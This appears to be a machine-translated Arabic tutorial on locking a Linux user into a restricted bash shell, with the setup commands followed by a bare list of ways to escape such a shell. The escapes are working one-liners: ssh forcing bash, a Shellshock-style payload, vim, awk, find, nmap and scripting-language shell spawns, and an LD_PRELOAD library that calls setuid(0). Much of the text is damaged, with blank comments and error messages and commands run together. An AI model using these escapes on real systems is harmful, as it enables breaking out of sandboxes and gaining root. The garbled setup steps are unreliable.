قصر حقوق المستخدم المحلية على نظام Linux على الحد الأدنى

• قيود الوصول من خلال خدمات الشبكة سه ، sftp (لم يصلح)
• تمايز حقوق الوصول بواسطة نظام التشغيل linux نفسه (لم يكن مناسبًا ، أود حلاً عالميًا)
• باستخدام الجذر (لم يصلح)
• استخدام الأدوات المساعدة التابعة لجهات خارجية ، على سبيل المثال SELinux (غير مناسب ، يعقد النظام).

• لا توجد طريقة لتغيير الدليل باستخدام الأمر cd
• لا يمكنك إعادة تعيين أو تغيير قيم المتغيرات SHELL و PATH و ENV و BASH_ENV
• يحظر تحديد الأوامر التي تحتوي على / (شرطة مائلة)
• يحظر استيراد وظائف من القشرة الرئيسية
• يحظر إعادة توجيه الإخراج باستخدام عوامل التشغيل> ، <، | ، <> ،> & ، & ، & ، & ، &
• يحظر استخدام الأمر exec لاستبدال الأمر ، إلخ.

echo '/bin/bash -r' > /bin/zbash chmod +x /bin/zbash 

 adduser --home /home/zuser --shell /bin/zbash zuser 

 chown root.zuser /home/zuser chmod 750 /home/zuser 

 cd ~zuser ls -a rm .bash* rm .profile ls -a 

 echo "PATH=:/home/zuser/bin" > .bashrc echo "alias help='echo access is limited'" >> .bashrc # alias   help echo "bind 'set disable-completion on'" >> .bashrc #    tab mkdir -p bin chmod 750 bin chown -R root.zuser /home/zuser chmod 640 .bash* 

 echo "alias echo=':'" >> .bashrc echo "alias cat=':'" >> .bashrc echo "alias bash=':'" >> .bashrc echo "alias sh=':'" >> .bashrc echo "alias ln=':'" >> .bashrc echo "alias set=':'" >> .bashrc echo "alias uset=':'" >> .bashrc echo "alias export=':'" >> .bashrc echo "alias typeset=':'" >> .bashrc echo "alias declare=':'" >> .bashrc echo "alias alias=':'" >> .bashrc echo "alias unalias=':'" >> .bashrc 

 root@host: su zuser zuser@host: help access is limited zuser@host: pwd /home/zuser zuser@host: ls /tmp/ bash: ls:    zuser@host: /bin/ls bash: /bin/ls:         {/} zuser@host: echo $PATH :/home/zuser/bin zuser@host: PATH=/bin/ bash: PATH:     zuser@host: exit 

 ln -s /bin/ping /home/zuser/bin/ping 

 mkdir /var/scripts echo "/usr/sbin/useradd -D" > /var/scripts/user-info chmod +x /var/scripts/user-info ln -s /var/scripts/user-info /home/zuser/bin/user-info 

 nano /var/scripts/ls 

 blacklist="\? ../ /etc /bin /boot /var" for var in $blacklist do if [[ $* == *$var* ]]; then echo 'Access is denied:' $* exit fi done /bin/ls $* 

 chmod +x /var/scripts/ls ln -s /var/scripts/ls /home/zuser/bin/ls 

 nano /var/scripts/cat 

 whitelist="./ /tmp/" #   for var in $whitelist do if [[ $* == *$var* ]]; then /bin/cat $* #   cat    exit fi done echo 'Access is denied:' $* 

 chmod +x /var/scripts/cat ln -s /var/scripts/cat /home/zuser/bin/cat 

• أنشأنا مستخدم zuser مع قذيفة rbash
• تعطيل القدرة على استخدام الإكمال التلقائي في وحدة التحكم
• يمكن zuser فقط تشغيل الأدوات المساعدة من الدليل / home / zuser / bin
• إضافة الأمر ping إلى zuser
• إضافة الأمر user-info إلى المستخدم zuser
• تم تقييد zuser من خلال المجمع لتنفيذ أوامر ls و cat

 ssh zuser@xxxx -t "/bin/bash" 

 ssh zuser@xxxx -t "bash --noprofile" 

 ssh zuser@xxxx -t "() { :; }; /bin/bash" 

 :!bash 

 :set shell=/bin/bash :shell 

 !bash 

 find . -maxdepth 0 -execdir /bin/bash \; 

 awk 'BEGIN {system("/bin/bash")}' 

 nmap --interactive 

 echo "os.execute('/bin/sh')" > exploit.nse nmap --script=exploit.nse 

 perl -e 'exec "/bin/bash";' 

 python -c 'import pty; pty.spawn("/bin/bash")' 

 ruby: exec "/bin/bash" 

 #include <stdio.h> #include <unistd.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("echo work"); system("/bin/bash --noprofile"); } 

 gcc -fPIC -shared -o evil.so evil.c -nostartfiles 

 LD_PRELOAD=$PWD/evil.so ls